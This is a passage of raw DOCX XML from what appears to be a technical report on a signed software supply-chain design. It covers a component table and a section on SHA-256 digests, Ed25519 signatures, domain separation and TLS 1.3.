            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>vendor/key_manager.py</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Generation, encrypted storage, rotation, revocation, root-signed trust policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Limits the damage and lifetime of a key compromise</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TLS registry (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>distribution/tls_registry.py</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HTTPS registry, TLS 1.3 only, local CA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Blocks network MITM and protocol downgrade</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Verifier (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>verifier/verify.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>manifest.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>policy.py</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Ten independent checks with a full report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Customer proves integrity, authenticity and authorisation</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Security gate (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ci/security_gate.py</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DEPLOY or BLOCK, security events, continuous pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enforcement is automatic and fail-closed</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Audit log (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>audit/audit_logger.py</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SQLite log with SHA-256 hash chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tamper-evident record of signing and decisions (fixes V6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dashboard (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>dashboard/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTML view of decisions and chain integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3175"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Operator and auditor visibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.4 Cryptographic Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.1 SHA-256: integrity fingerprint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-256 (FIPS 180-4 [4]) maps an artifact of any size to a 256-bit digest. Finding two different files with the same digest is computationally infeasible (about 2^128 work for a collision), so a single changed bit gives a completely different digest. The vendor computes the digest at build time and stores it in the manifest; the customer recomputes it on the downloaded bytes and compares the two in constant time. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHA-256 alone provides integrity relative to a reference value, not authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: anyone, including an attacker, can compute the SHA-256 of a malicious file and publish it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.2 Ed25519 digital signatures: authenticity and integrity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ed25519 (EdDSA over Curve25519, RFC 8032 [5], approved in FIPS 186-5 [6]) is used for every signature. The vendor signs with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>private key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> held only by the signing service. The customer verifies with the corresponding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>public key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. A valid signature proves that the holder of the private key approved exactly these bytes: any change to the artifact or manifest makes verification fail, and nobody without the private key can produce a valid signature. Ed25519 was chosen because it offers about 128-bit security, 32-byte keys and 64-byte signatures, is fast, and is deterministic, so it cannot fail through a bad random number at signing time, a classic ECDSA pitfall. RSA-PSS with 3072-bit keys would be an acceptable alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Vendor:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> artifact → SHA-256 → manifest (+ provenance) → Ed25519 with private key → signatures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Customer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> artifact + manifest + signatures + trusted public key → verification → accept or reject.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The private key is never distributed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: if customers held it, anyone who compromised any one customer could sign malware that every other customer would accept.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.3 Why hashing alone is insufficient</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In the Codecov scenario the attacker controlled the storage location. A checksum file stored next to the script can be replaced just as easily as the script, and if the checksum is correct for the malicious file, a hash-only check passes. With a signed manifest, the attacker must also forge an Ed25519 signature under a key listed in the root-signed trust policy, which is infeasible without the vendor's private key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.4 Domain separation and canonical encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Every signature is computed over a context prefix plus the message: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SSCS-v1/artifact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SSCS-v1/manifest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SSCS-v1/trust-policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. A signature created for one purpose can therefore never be replayed as a valid signature for another. JSON objects are signed in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>canonical form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (sorted keys, no whitespace, UTF-8), so the signed bytes are identical on every platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.5 TLS 1.3 versus digital signatures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS 1.3 (RFC 8446 [7]) protects the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: server authentication with a CA-validated certificate, forward-secret ECDHE key exchange and AEAD encryption such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>TLS_AES_256_GCM_SHA384</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. It stops a network man-in-the-middle and downgrade attacks. However, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TLS cannot guarantee that an artifact was not maliciously modified before transmission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Digital signatures protect the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> end to end and keep working even when the registry or CDN is compromised. The design uses both.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760000" cy="2402519"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="crypto_flow.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="2402519"/>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5.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Vendor signing and customer verification flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Cryptographic primitives and their purpose</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2608"/>
        <w:gridCol w:w="3288"/>
        <w:gridCol w:w="3061"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Primitive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Used for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Security property</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Artifact digest, provenance digest, audit hash chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
